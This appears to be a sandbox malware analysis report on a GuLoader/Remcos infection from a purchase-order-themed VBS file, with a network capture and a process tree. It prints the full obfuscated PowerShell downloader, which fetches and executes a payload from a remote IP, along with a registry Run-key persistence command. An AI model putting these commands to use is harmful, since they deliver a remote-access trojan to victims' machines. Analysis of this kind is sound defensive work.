                                                                  Apr 25, 2024 15:12:12.375365973 CEST182OUTGET /YSnpkrCwWalJFSpN146.bin HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: 87.121.105.163
                                                                  Cache-Control: no-cache
                                                                  Apr 25, 2024 15:12:12.583729029 CEST1289INHTTP/1.1 200 OK
                                                                  Date: Thu, 25 Apr 2024 13:12:12 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Last-Modified: Thu, 18 Apr 2024 05:48:08 GMT
                                                                  ETag: "78c40-6165884033600"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 494656
                                                                  Content-Type: application/octet-stream
                                                                  Data Raw: c2 53 08 27 d0 a3 39 20 6e 36 df e2 56 69 0f dc 8b 59 6d 70 83 96 03 b5 f0 8f df b3 12 20 ec 3f e3 f2 b1 64 14 11 29 05 8b 50 01 00 76 af 71 e5 a2 bf 48 f0 0c 3b 42 59 d2 ae a3 5c f7 03 ee 99 f2 a3 09 33 47 62 46 e7 9c d1 81 bb 1e d3 7e 25 5a 95 61 93 30 e8 02 29 61 ad e0 4c f5 99 d7 57 c3 10 63 32 09 9f a1 49 32 f3 b3 0f fb 12 eb dd 22 19 17 d9 ad 76 86 96 9f 47 43 0f df 8b 51 01 42 8f 1e ef 45 50 f7 f7 31 dc 1d 43 f2 c8 19 7d 20 8c d9 66 17 0d b4 9a cc 83 7a 87 cc e1 d2 5a 02 b5 7d ee f4 7b 75 bf 47 c2 5e 4d e9 68 c9 d8 69 bb 02 76 25 42 81 1f c1 aa d7 a3 fd e0 51 ac 81 8d f2 bd a6 2b 6d 26 5b d1 ae 0e 97 1f c7 81 1c 4a 75 19 f5 33 df 4b b3 ed 75 1f b1 11 46 35 ac fa c3 d0 81 69 7b f9 18 a9 14 22 2e f1 92 3b ad 91 34 bc 35 78 e7 62 e9 77 33 d1 73 0c 28 d7 3c 63 0e b6 67 f8 2d 75 aa 99 8a e8 53 9c ba e9 36 15 10 99 2f 13 52 f8 a3 0a 88 0a 00 50 9a fa ac f9 ee 84 f3 7c ef 79 0d 01 8a 75 f9 9a f2 d5 01 04 c5 e9 59 a7 c0 38 38 d8 6d fa 92 9c b7 4f c0 45 b6 68 b8 5c e5 b0 1c b3 fb 63 30 f2 b7 9d 0c e7 e5 65 bc c4 7a b0 42 0b 38 15 5c 5b f7 49 db 64 ba fa 13 b2 ba 99 35 bd 6e ec ee f8 a0 be 7b 1e 2b 8f b1 10 14 f2 5f f7 9e ec 4f 0b 14 d7 13 10 3b a1 f9 18 be 0d 29 1f f7 3a ea 84 4f 91 3d 74 c5 b6 88 8a f9 27 cc eb 91 d5 e4 e8 4f 62 66 ed ca 70 c7 4a 7b f8 42 f8 b3 62 86 84 37 49 f4 71 5a ba cc 96 3f 76 db 63 a2 2c db ad 8b f6 f7 a9 9a 1a 58 ae 27 ee 08 a3 14 96 14 a3 a0 7d eb 10 99 4b a3 66 1f 3f e3 38 d6 d2 6c a5 32 ce 2f fa 02 cf ef f1 7c 36 91 9d ed d7 2f fd 1b 7f c7 33 22 93 b2 a6 7c df 2f a7 01 35 5f 2f e3 82 a5 74 8d 91 26 3b 05 16 9a 49 db f5 7d ff 1e f9 7d 8b c6 f5 47 31 0d 02 d8 bf 16 e2 a3 e6 99 a3 c4 94 6f c2 dc d4 9b 6f 44 2a d7 70 c3 cc df 8c 72 bf 42 17 4c be 4b ca 8c 7c fc 6d c5 87 ce 20 ba 82 92 ba 63 98 b1 69 e5 b3 81 6c b6 54 cf 4d 5f ca 5d 33 d5 04 cb a1 d9 4a dc fe 39 e2 d1 d2 1f 58 d5 f0 e7 a6 0b 6f a2 55 eb 31 94 e4 dc d5 db 23 dd 59 20 fc 15 4c 01 f6 f5 dd 07 c9 9a f3 f1 cf 34 b4 2c fc 39 98 03 3b 9e c9 ec 2f 07 72 9c 55 13 fe 6c 99 04 d9 ac 9b 70 11 15 db df 10 54 a0 33 e7 00 63 6a 23 81 ce 39 aa 17 09 1d bb f8 34 7f dd 15 21 8d 2a 69 45 0a 3e 5f 25 0f 66 51 9f 31 9b 08 d5 c4 c0 38 e0 08 35 a3 11 bb 33 a2 4e d5 45 d4 e2 fe 82 02 7d 37 2f 4d 3b 1f c7 67 eb 58 e4 9a 19 fc aa c9 4a 40 86 4a 68 5b a5 27 0a 68 a8 93 95 cf 63 70 41 25 e6 c0 dc 53 dc 57 e9 ce 18 85 78 85 86 1e 71 84 f3 56 c2 f9 54 f9 2c b8 02 7c dc 26 15 54 c9 e1 0f a4 61 62 e6 b6 35 4e e7 8b 10 55 73 e5 3c 13 f7 b2 bb 0e 04 32 97 8b 63 53 c0 8e e7 4b 1a cb 87 06 dd 40 c6 9d 48 d6 2a d6 a0 9c d2 18 86 0b 0e 65 65 48 85 6d 2c c6 54 9f 26 32 ed 78 da e6 a8 0e a3 64 fb bf 2d 9c 9e 4f 07 76 35 a8 0f f6 e9 ba 50 f1 34 5e af f0 5c bd d4 3b 5b 78 a9 49 8a 9e d5 75 74 d1 3b 89 f7 43 b4 05 4e 12 ac 7f 8d 9c 09 2c 73 d1 3f ac f2 d1 b6 db ef 61 98 a5 e4 8a 6c 5b 76 80 51 45 f8 13 ba bd 4b 77 ea 26 2c dd 72 08 0f 86 ca 1e 0e 4b 83 5e 0a 03 76 14 4f af 31 44 7b 7b d0 b7 88 f6 d5 11 ef 86 6e 5b 20 81 d3 41 f8 c2 c5 e8 0d bd 23 82 d2 4c be 46 5f 84 93 57 fa 16 d2 64 46 41 3e dd 65 78 7f 02 d0 05 c6 b8 8f ed b9 3b 69 66 8a 8c 3d 9a a2 d5 12 7e 73 55 17 39 ee cf c5 93 59 c3 9f 55 5c cb e2 f7 29 b6 51
                                                                  Data Ascii: S'9 n6ViYmp ?d)PvqH;BY\3GbF~%Za0)aLWc2I2"vGCQBEP1C} fzZ}{uG^Mhiv%BQ+m&[Ju3KuF5i{".;45xbw3s(<cg-uS6/RP|yuY88mOEh\c0ezB8\[Id5n{+_O;):O=t'ObfpJ{Bb7IqZ?vc,X'}Kf?8l2/|6/3"|/5_/t&;I}}G1ooD*prBLK|m cilTM_]3J9XoU1#Y L4,9;/rUlpT3cj#94!*iE>_%fQ1853NE}7/M;gXJ@Jh['hcpA%SWxqVT,|&Tab5NUs<2cSK@H*eeHm,T&2xd-Ov5P4^\;[xIut;CN,s?al[vQEKw&,rK^vO1D{{n[ A#LF_WdFA>ex;if=~sU9YU\)Q
                                                                  Apr 25, 2024 15:12:12.583789110 CEST1289INData Raw: ab 2f 4b ba 51 cb 92 52 e0 1f 75 e1 ec c9 bb 3e 7e ce 24 d7 39 3a b1 0e 5d 77 8c ad 49 72 5e f1 ad c7 e7 98 84 b0 6e a5 f4 c9 d0 7e f1 df e5 8b 52 3e da ac 0c 22 20 84 b9 92 b5 9b f6 8f 6d 34 ac 2c 72 0f d1 3f 3b a1 c3 24 69 2d 68 15 ab 09 33 52
                                                                  Data Ascii: /KQRu>~$9:]wIr^n~R>" m4,r?;$i-h3Rg=)4me] 3c{+"Hvd,?}9Yl:_uOy>#`'YdRmINz1eh"^E:1sRGRgB@&k&l{,
                                                                  Apr 25, 2024 15:12:12.583827019 CEST1289INData Raw: 24 98 4d 74 b8 6f 5b 2f 43 e8 1d d8 54 ba 55 94 4a e9 26 44 9e f3 4d 0f 6e b0 2c 0d 4b da 9d 62 4e f7 51 4f 47 5f 76 78 7b 89 74 e0 a1 54 54 ef 6e 0c 69 23 81 8a 82 90 a3 44 ad 0d 55 75 b0 d1 4c e7 85 e6 54 b2 10 fa fe 77 59 45 41 56 b6 e4 3d 7f
                                                                  Data Ascii: $Mto[/CTUJ&DMn,KbNQOG_vx{tTTni#DUuLTwYEAV=7.uF@Vn}S<qP4%^,K9Q;y,DJZ6Y*t.~zMs.qFnI*xPzza~PM- ED[sGW# g<9a&k"ON
                                                                  Apr 25, 2024 15:12:12.583865881 CEST1289INData Raw: 3a 5d 9e e7 8b 14 ba 98 e0 3c 13 56 66 d0 49 04 f3 77 8e 60 16 54 c3 e0 65 02 8e bb 96 8b 88 ec 16 73 29 3f 92 d4 de d2 93 b7 df 65 22 35 a7 52 90 d3 39 d7 a2 72 59 aa 78 25 93 a7 c5 6c 8c b1 91 2d 9c cf c4 c8 9e ae 86 0f f6 6a 56 48 7c 70 7a 87
                                                                  Data Ascii: :]<VfIw`Tes)?e"5R9rYx%l-jVH|pz{<]x#(;VBNRM{ba/sQH1X&1n[Z;C@Q<ez[ CI/ILI?}FA>4;&,Q8"\;VypFHQSd%~m(o
                                                                  Apr 25, 2024 15:12:12.583901882 CEST1289INData Raw: 64 9d fb ae 17 40 43 f6 bf 34 97 b4 17 21 8d 40 69 2f 0a d6 3c 57 0c a6 b3 02 7c eb 08 d5 ae c0 5b e1 e0 75 a0 61 bc f0 f7 c7 39 14 87 97 a5 8a 55 f6 ce 14 b6 4f 45 ad 67 81 59 0c fd 1a fc 6a 6c e6 ce 0e 2c 1b 5b f5 9c c7 80 71 91 15 c8 33 98 46
                                                                  Data Ascii: d@C4!@i/<W|[ua9UOEgYjl,[q3F4XN=!l'Z v[)IIR-3@kzei25w|]sXde_OV&+&@WOr5A:^^Px<]xO7:6,an`pH
                                                                  Apr 25, 2024 15:12:12.583939075 CEST1289INData Raw: f9 fa 42 9e 08 9a 5b bc 99 83 88 49 d1 d7 26 ac b6 82 92 e3 33 cd 59 6a 39 38 1b 97 06 58 44 4e a1 75 18 63 2a 60 ef b5 31 ca 24 01 c6 6d 19 3a 60 5b d5 f0 ba fd 80 a1 4a 0f e8 31 b4 1b a8 91 f9 da 77 ff 54 92 15 4c b7 67 e3 d8 07 59 c1 31 f9 b5
                                                                  Data Ascii: B[I&3Yj98XDNuc*`1$m:`[J1wTLgY1/<Bc >fo$P3}Wk7KS!1K*e)S9?kb(TL_g[N}r,[.S,dc&!#bMzNJ)?\#&_Lg
                                                                  Apr 25, 2024 15:12:12.583973885 CEST1289INData Raw: 25 9c 4d 15 eb ce 98 7d 38 41 a8 e3 b7 51 ac 21 f7 93 42 7e 8d a0 a0 7d a8 cc 1f 37 83 77 1f 4b fc 2b 2f c2 e7 f5 b9 01 c7 e9 fb 30 10 7a b3 bd 91 a6 1d d8 6d 3b 4b 15 c6 3b b6 69 81 62 97 d3 ea 82 72 3f 31 a4 2c 6a b5 74 8d 91 a3 cd 5a 19 0f 89
                                                                  Data Ascii: %M}8AQ!B~}7wK+/0zm;K;ibr?1,jtZ7uV?9S"=_SEO7@`4E@6]a]zS*h1S.FxKQFbsYwJ?,x A6],QtmA`P.Gc8
                                                                  Apr 25, 2024 15:12:12.584013939 CEST1289INData Raw: 86 8f 3d a9 e1 9f 8f b2 e3 c7 df 6f cf 86 93 91 b4 3b 0d 9a 0f 46 b9 bc db 32 d4 1a 5d a4 83 6d d7 9b ce de ff 5a 3c 70 c1 43 e3 28 e2 48 ad be 92 16 29 8f b1 41 fc ec b0 be 9d b5 8d 1f 14 3e 34 80 3e a1 a8 f0 e6 0d 29 0f ae f8 ee 86 a6 ba 38 74
                                                                  Data Ascii: =o;F2]mZ<pC(H)A>4>)8t" S-``bfI<JB56UFR,aXenl#\byCF`X+WUD$nbf2,h}co$~t?&Hi>I<kD9xhCdO
                                                                  Apr 25, 2024 15:12:12.584054947 CEST1289INData Raw: 9e 2b 7b 70 8f 6e dc 17 5f da ae 98 45 f6 87 70 5f db de 2c 4a 03 11 4b 50 9c b4 23 9a 83 46 ee 59 2b 45 0c ea 4e 4f 15 f6 86 2a 2a 1e 82 32 1c 5c 5e a0 52 aa 38 ad 41 a8 36 21 36 45 8f b5 03 a7 71 5b 97 39 36 e4 59 9f 4f 55 e7 7e 62 41 d8 60 15
                                                                  Data Ascii: +{pn_Ep_,JKP#FY+ENO**2\^R8A6!6Eq[96YOU~bA`e%{9]k/rh'BLi1B5E=i37*t]CxbBGg7g5_aBy~:]l`hcO&h;<Ob5FT(L{RsP9
                                                                  Apr 25, 2024 15:12:12.584093094 CEST1289INData Raw: 3c 6a 9e 10 f4 e4 51 d6 55 89 c0 c7 3b 71 cb bd 3c ef 60 76 2d 83 f1 a1 ec 2e 4c f0 78 d6 e7 56 ec 4c ff c3 5c 89 79 c9 14 81 1e 51 94 48 41 01 c7 5e 4c b4 b5 1b 01 f6 43 32 4b 65 3f 62 bc fd 65 0f 06 e9 ee 3e f7 f0 26 a2 7e f0 fe 67 a2 c5 89 6a
                                                                  Data Ascii: <jQU;q<`v-.LxVL\yQHA^LC2Ke?be>&~gjCcee#kA'G!>+{%R(zX+oS?<`xi#+}1\;s~m1*{<q^%${y./kB_UE(Xmj?5
                                                                  Apr 25, 2024 15:12:12.792120934 CEST1289INData Raw: 09 9f 1d 12 df 84 58 37 7b 46 8b 84 3a ae 93 10 6b ec e2 3b 45 5d 2e b6 b3 9d e8 62 52 1f 02 80 03 15 01 bb de 66 15 1e 37 a8 48 dc 51 28 95 68 77 06 06 22 cf 00 87 32 e8 93 bd 0c 2b 2b ad 44 a5 6e fd db 87 b2 6e 34 b6 b0 37 08 dd e3 73 86 57 1f
                                                                  Data Ascii: X7{F:k;E].bRf7HQ(hw"2++Dnn47sW, ]GF{bpaeD/,L'O6?-*"SH\q+ua&'amo,&(M5[?>NM(Bl'(i$@9;=+


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:15:11:09
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs"
                                                                  Imagebase:0x7ff64fba0000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:15:11:12
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2397266995.000001E3D03D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:15:11:12
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:15:11:30
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
                                                                  Imagebase:0x7ff7809c0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:15:11:36
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
                                                                  Imagebase:0x230000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2315688499.0000000008610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2315989760.0000000009092000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2306786196.00000000059B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:15:11:37
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:15:12:05
                                                                  Start date:25/04/2024
                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                  Imagebase:0x2f0000
                                                                  File size:516'608 bytes
                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:15:12:10
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:15:12:10
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:15:12:10
                                                                  Start date:25/04/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
                                                                  Imagebase:0x150000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2412691384.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d585d121cae89e93e0fcbaaa8e4354fe93cd40af9b1c8cad839a7ecfa87ffde
                                                                    • Instruction ID: 72e991f1a7399bcec59f3c86643d27ba17fda9db661a6995afb1c88ebd6549f2
                                                                    • Opcode Fuzzy Hash: 9d585d121cae89e93e0fcbaaa8e4354fe93cd40af9b1c8cad839a7ecfa87ffde
